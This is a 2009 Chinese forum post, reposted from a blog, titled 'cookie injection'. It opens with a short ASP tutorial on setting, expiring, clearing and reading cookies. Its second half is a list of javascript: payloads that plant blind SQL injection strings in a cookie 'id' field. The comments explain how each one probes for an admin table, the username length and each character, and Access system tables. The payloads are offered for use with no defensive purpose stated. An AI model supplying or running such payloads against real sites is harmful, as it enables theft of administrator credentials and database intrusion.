免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2014 | 回复: 0
打印 上一主题 下一主题

Cookies注入 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-08-08 11:38 |只看该作者 |倒序浏览

Cookies注入:
1.如何写入Cookies?
  Response.Cookies("字段名")=变量或字符串,例如:
  Response.Cookies("name2")="Dingdang"
  
  2.如何设置Cookies时间?
  Response.Cookies("字段名").expires=时间函数+N,例如:
  Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
  Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。
  
  3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:
  Response.Cookies("字段名")=""
  之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。
  
  4.如何读取Cookies?
  变量名=Request.Cookies("字段名"),例如:
  name2=Request.Cookies("name2")
  如果网页中写入这句,则会显示“Dingdang”。
  也可以这样直接读取Cookies,
  
  Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。
  
  指令:
  
  javascript:alert(document.cookie="id="+escape("156 and 1=1"));
  javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
  //猜是否有admin表
  javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
  //猜是否有username表
  javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
  //看管理员密码是否是5位
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
  //第一位是否是ASC码97,相当于a
  javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
  //第二位
  javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
  //看系统表

本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u3/101492/showart_2021501.html
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP